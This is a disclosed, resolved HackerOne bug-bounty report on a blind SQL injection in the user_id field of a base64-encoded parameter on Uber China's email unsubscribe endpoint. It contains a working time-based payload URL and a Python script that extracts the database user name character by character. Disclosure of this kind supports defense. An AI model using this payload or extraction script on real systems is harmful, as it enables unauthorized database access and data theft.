SQL Injection on sctrack.email.uber.com.cn
Unknown
Vulnerability Details
Hi, Uber Security team
I just traveled to China, when I call Uber in China. I received an advertisement mail from Uber and I found the unsubscribe link is different from the original unsubscribe link, and there is a SQL Injection under the unsubscribe link.
You can see where to find the unsubscribe link from the attachments.
The parameter of user_id is suffered from SQL Injection.
Payload
```
http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==
```
You can see the server sleep 12 seconds.
I write a script to dump the database name and user name.
```
import json
import string
import requests
from urllib import quote
from base64 import b64encode
base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}
for l in range(0, 30):
for i in 'i'+base:
payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i)
new_payload = json.dumps(payload)
new_payload = b64encode(new_payload)
r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload))
if len(r.content)>0:
print i,
break
```
The username of mysql user is `[email protected]`
The database name is `sendcloud`
Actions
View on HackerOneReport Stats
- Report ID: 150156
- State: Closed
- Substate: resolved
- Upvotes: 85